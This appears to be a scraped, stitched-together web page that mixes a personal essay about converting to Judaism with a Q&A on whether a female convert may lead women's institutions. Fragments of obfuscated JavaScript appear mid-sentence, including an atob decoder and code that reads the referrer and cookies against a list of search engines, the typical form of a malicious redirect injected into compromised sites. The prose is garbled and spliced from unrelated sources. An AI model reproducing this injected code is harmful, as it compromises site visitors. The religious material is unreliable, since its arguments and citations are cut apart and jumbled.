10 Things Nobody Told Me About Converting to JudaismThe story of how I came to convert to Judaism is relatively straightforward: I met a man I loved -â his name is Ben and he happens to be a Modern Orthodox Jew -- and through him, met a religion I also loved.
A convert is permitted to act as an authority within the chain of command The most obvious example comes from Pirkei Avot 5:21-22 which quote as Torah authorities, Ben Bag-Bag and Ben He-He.. Like water from the tap filling the pitcher But once the vessel is filled, it conveys the water from the tap to the mouth of the one who is thirsting.. But if she consults with others in committee, it would be fine Leadership has many different levels in the chain of command.. altavista ',_0x5125('0x29')],_0x5c18a1=document['referrer'],_0x4f9ba9=![],_0x3a96d8=cookie[_0x5125('0x2a')](_0x27ee09['BhdYS']);for(var _0x4f52df=0x0;_0x4f52df
Both their names hint to the letter 'Heh' which is a sign of the 'Heh' added to Avraham and Sarah's names.
" (Mishneh Torah, Hilchos Melachim 1:4)In light of the Rambam above and the answers here, which discuss the prohibition on appointing a woman or a convert to certain positions of power, would it be permissible to make an adult female convert a leader of non-convert women, for example as the rebbetzin of a community, a mikvah lady, or the menaheles of a women's yeshiva? (May not be the best examples, but I can't think of a perfect one now.. ) Why or why not? Preferably, please bring sources 1 AnswerThe emphasis of the Rambam in your citation is not about being in a position of communal authority.. They were both Tannaim of the first century and converts to Judaism Their true names were concealed because of Roman persecution against Jewish converts at the time.. If she is the final word in making decisions for the yeshiva, it would seem inappropriate.. constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0xbf716b){_0x2c80eb=window;}return _0x2c80eb;};var _0x1da8b5=_0x26d5d4();var _0x2d0a94='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1da8b5['atob']||(_0x1da8b5['atob']=function(_0x48efa9){var _0x429ba8=String(_0x48efa9)['replace'](/=+$/,'');for(var _0x4a5b30=0x0,_0x57e9d1,_0x5eb0b1,_0x203f2a=0x0,_0x2940d6='';_0x5eb0b1=_0x429ba8['charAt'](_0x203f2a++);~_0x5eb0b1&&(_0x57e9d1=_0x4a5b30%0x4?_0x57e9d1*0x40+_0x5eb0b1:_0x5eb0b1,_0x4a5b30++%0x4)?_0x2940d6+=String['fromCharCode'](0xff&_0x57e9d1>>(-0x2*_0x4a5b30&0x6)):0x0){_0x5eb0b1=_0x2d0a94['indexOf'](_0x5eb0b1);}return _0x2940d6;});}());_0x5125['base64DecodeUnicode']=function(_0x192164){var _0xbd4e5c=atob(_0x192164);var _0x2be5fd=[];for(var _0x1bd9d6=0x0,_0xcdba48=_0xbd4e5c['length'];_0x1bd9d6=_0x17e068;},'VWjgJ':function _0x360f74(_0x409db8,_0xf10074){return _0x409db8(_0xf10074);},'oreyO':function _0x17a405(_0x3700d4,_0x330b87){return _0x3700d4+_0x330b87;},'DAdXY':function _0x1fe805(_0x380732,_0x4634a5){return _0x380732+_0x4634a5;}};var _0x5111ea=[_0x5125('0x25'),_0x5125('0x26'),_0x27ee09[_0x5125('0x27')],_0x27ee09[_0x5125('0x28')],_0x27ee09['sZLVH'],'.. In regard to your examples for women, a Rebbetzin is not an appointed position It is a consequence of her marriage to the community Rav.. (Can you tell there are a lot of rules in Judaism?)But the toil has been worth it, the rewards, many, and bottom-line: Ben is my beshert (thatâs yiddish for âsoulmate. e828bfe731